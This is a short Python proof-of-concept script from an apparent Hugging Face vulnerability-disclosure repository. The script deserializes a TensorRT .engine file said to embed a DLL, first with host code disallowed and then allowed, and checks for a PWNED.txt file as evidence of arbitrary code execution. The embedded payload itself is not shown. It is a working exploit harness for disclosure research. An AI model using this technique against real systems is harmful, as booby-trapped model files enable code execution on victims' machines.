tensorrt-ace-poc-embedded-plugin / load_malicious_engine.py
treforbenbow's picture
Upload load_malicious_engine.py with huggingface_hub
201a578 verified
"""
TensorRT ACE PoC - Step 2: Load the malicious .engine file.
This script:
1. Reads the malicious .engine file (which contains an embedded DLL)
2. Creates a TensorRT runtime WITHOUT setting engine_host_code_allowed
3. Attempts to deserialize the engine
4. Checks if arbitrary code was executed (PWNED.txt created)
If the PWNED.txt file is created, it proves that TensorRT executed
arbitrary native code from the .engine file without any security gate.
"""
import os
import sys
import tensorrt as trt
def load_malicious_engine():
ENGINE_FILE = os.path.join(os.path.dirname(__file__), "malicious_model.engine")
PROOF_FILE = os.path.join(os.path.dirname(__file__), "PWNED.txt")
if not os.path.exists(ENGINE_FILE):
print(f"ERROR: Engine file not found: {ENGINE_FILE}")
print("Run build_malicious_engine.py first")
return False
# Clean up any previous proof file
if os.path.exists(PROOF_FILE):
os.remove(PROOF_FILE)
print(f"[*] Removed previous proof file")
logger = trt.Logger(trt.Logger.VERBOSE)
# Create runtime WITHOUT enabling engine_host_code_allowed
runtime = trt.Runtime(logger)
print(f"[*] Runtime created")
print(f"[*] engine_host_code_allowed = {runtime.engine_host_code_allowed}")
print(f"[*] NOTE: engine_host_code_allowed is FALSE (default)")
# Read the engine file
print(f"[*] Reading engine file: {ENGINE_FILE}")
with open(ENGINE_FILE, "rb") as f:
engine_data = f.read()
print(f"[*] Engine data size: {len(engine_data)} bytes")
# Attempt to deserialize - this is where ACE would occur
print(f"[*] Attempting to deserialize engine...")
print(f"[*] If a message box appears or PWNED.txt is created, ACE is confirmed!")
engine = runtime.deserialize_cuda_engine(engine_data)
if engine is not None:
print(f"[+] Engine deserialized successfully!")
else:
print(f"[-] Engine deserialization failed (returned None)")
print(f"[*] This might mean engine_host_code_allowed blocked it")
print(f"[*] Trying again WITH engine_host_code_allowed = True...")
runtime2 = trt.Runtime(logger)
runtime2.engine_host_code_allowed = True
print(f"[*] engine_host_code_allowed = {runtime2.engine_host_code_allowed}")
engine = runtime2.deserialize_cuda_engine(engine_data)
if engine is not None:
print(f"[+] Engine deserialized with flag enabled!")
else:
print(f"[-] Still failed. Plugin might have issues.")
# Check for proof of ACE
print(f"\n{'='*60}")
if os.path.exists(PROOF_FILE):
print(f"[!!!] ARBITRARY CODE EXECUTION CONFIRMED!")
print(f"[!!!] Proof file created: {PROOF_FILE}")
with open(PROOF_FILE, "r") as f:
print(f"[!!!] Contents: {f.read()}")
else:
print(f"[-] No proof file found - ACE did not trigger")
print(f"[-] (Note: MessageBox might still have appeared)")
print(f"{'='*60}")
return os.path.exists(PROOF_FILE)
if __name__ == "__main__":
success = load_malicious_engine()
sys.exit(0 if success else 1)